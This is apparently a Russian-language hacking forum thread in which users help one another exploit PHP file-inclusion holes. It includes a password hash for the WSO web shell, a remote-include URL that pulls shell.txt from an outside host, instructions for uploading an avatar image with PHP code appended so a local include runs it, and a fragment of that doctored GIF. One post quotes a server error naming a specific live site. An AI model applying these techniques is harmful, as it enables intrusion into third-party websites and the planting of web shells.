а там пароль по умолчанию не знаю ( только есть хэш: 63a9f0ea7bb98050796b649e85481845 а зачем папка WSOmanager ? там что ? кстати, а как тогда направить инклюд, если этот шелл требует авторизацию? темно как то мне ....
root пароль, там комент должен быть: 63a9f0ea7bb98050796b649e85481845 // root как то так, не помню точно. И хватит оффтопить в теме.
index.php?page=http://nabstre.tu2.ru/shell.txt? вот почему в конце ? никак не пойму, если можно то плиссс с примером исходного кода
Смотри... У тебя есть локальный инклуд. Твоя задача - подставить туда такой файл, чтобы выполнялся твой код. Ищешь какие-нибудь форумы, cms'ки и т.д. Регаешься там. И заливаешь туда картинку как аватарку. Но до этого в конец этой картинки вставляешь свой код. Таким образом, проинклудив эту аватарку, у тебя есть выполняется твой evil-code.
Вот так я вижу gif-ку с блокнота. Code: <ЖЖєвЬЖ}}|РРаъмМЧШзггУлУЁіі©С鶶ёш}}~ййъґґОЕЕФОФ¬§а`Лж®че·~ ~Зє¤жжЪЉЉ…|}~ФжєЕЅж||}ЫзЖоНћМХйДШЕzyuЄЄљэхЩєИ* [[UнцдииЫєЅмЦлє{|}гиИz{|}}}Жб¬~цовКеІЛеіАОХjjeјЕеЩЪщ} ~ћћЖТЬЏЖЭ»KKF{{|<<6¬¬зън №ЩтКќћ§дтЧ…€ѓzz{–˜ЋКПСТвЄ{}~z|}}~}Љ‡|ЅЙЪ~~}~~°± ІІІІ|}}yyzјДКЬжЫйЭОЬюЬЄз*yz{ЅАцz{z{| {лфйxyzґґі¶¶юхТўддгюоіююэЛи®ааО В конце всего мне надо сделать так: Code: .......<ЖЖєвЬЖ}}|РРаъмМЧШзггУлУЁіі©С鶶ёш}}~ййъґґОЕЕФОФ¬§а`Лж®че·~ ~Зє¤жжЪЉЉ…|}~ФжєЕЅж||}ЫзЖоНћМХйДШЕzyuЄЄљэхЩєИ* [[UнцдииЫєЅмЦлє{|}гиИz{|}}}Жб¬~цовКеІЛеіАОХjjeјЕеЩЪщ} ~ћћЖТЬЏЖЭ»KKF{{|<<6¬¬зън №ЩтКќћ§дтЧ…€ѓzz{–˜ЋКПСТвЄ{}~z|}}~}Љ‡|ЅЙЪ~~}~~°± ІІІІ|}}yyzјДКЬжЫйЭОЬюЬЄз*yz{ЅАцz{z{| {лфйxyzґґі¶¶юхТўддгюоіююэЛи®ааО <?php ........................................ ='\x29\x29\x29\x3B",".");?> ?? Принцип работы уязвимости понял. С картинкой вопрос только. Че да как редактировать.
и к чему сей час волноваться за сохранность картинки? его, как мне показалось, интересовала техническая сторона.
Warning: require(): http:// wrapper is disabled in the server configuration by allow_url_include=0 in /web/htdocs/www.otcdoors.com/home/index.php on line 344 с этим как быть? админ выключил возможность инклуда с http
